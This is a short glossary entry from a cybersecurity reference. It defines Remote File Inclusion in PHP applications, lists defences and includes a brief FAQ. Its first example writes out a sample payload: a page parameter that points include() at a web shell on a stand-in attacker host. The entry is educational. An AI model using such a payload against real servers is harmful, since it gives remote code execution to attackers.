Remote File Inclusion (RFI)
What is Remote File Inclusion (RFI)?
Remote File Inclusion (RFI)A vulnerability that lets an attacker force a server to fetch and execute code from a remote URL of their choosing.
Remote File Inclusion (RFI) occurs when an application passes user-controlled input to an include or require function and the runtime supports remote URLs (for example PHP with allow_url_include enabled). The server downloads the file from an attacker-controlled host and executes it within the application's process, yielding immediate remote code execution. RFI is generally more severe than LFI because no prior write access to the server is required. Defences are disabling remote URL inclusion in the runtime, using strict allow-lists of static module names, never including paths derived from user input, and segmenting application servers with strict egress filtering.
● Examples
- 01
A PHP app calling include($_GET['page']) where ?page=https://attacker.example/shell.txt loads and runs a web shell.
- 02
An outdated CMS plugin pulling an admin page from a URL parameter, allowing an attacker-hosted PHP file to execute.
● Frequently asked questions
What is Remote File Inclusion (RFI)?
A vulnerability that lets an attacker force a server to fetch and execute code from a remote URL of their choosing. It belongs to the Attacks & Threats category of cybersecurity.
What does Remote File Inclusion (RFI) mean?
A vulnerability that lets an attacker force a server to fetch and execute code from a remote URL of their choosing.
How do you defend against Remote File Inclusion (RFI)?
Defences for Remote File Inclusion (RFI) typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for Remote File Inclusion (RFI)?
Common alternative names include: RFI.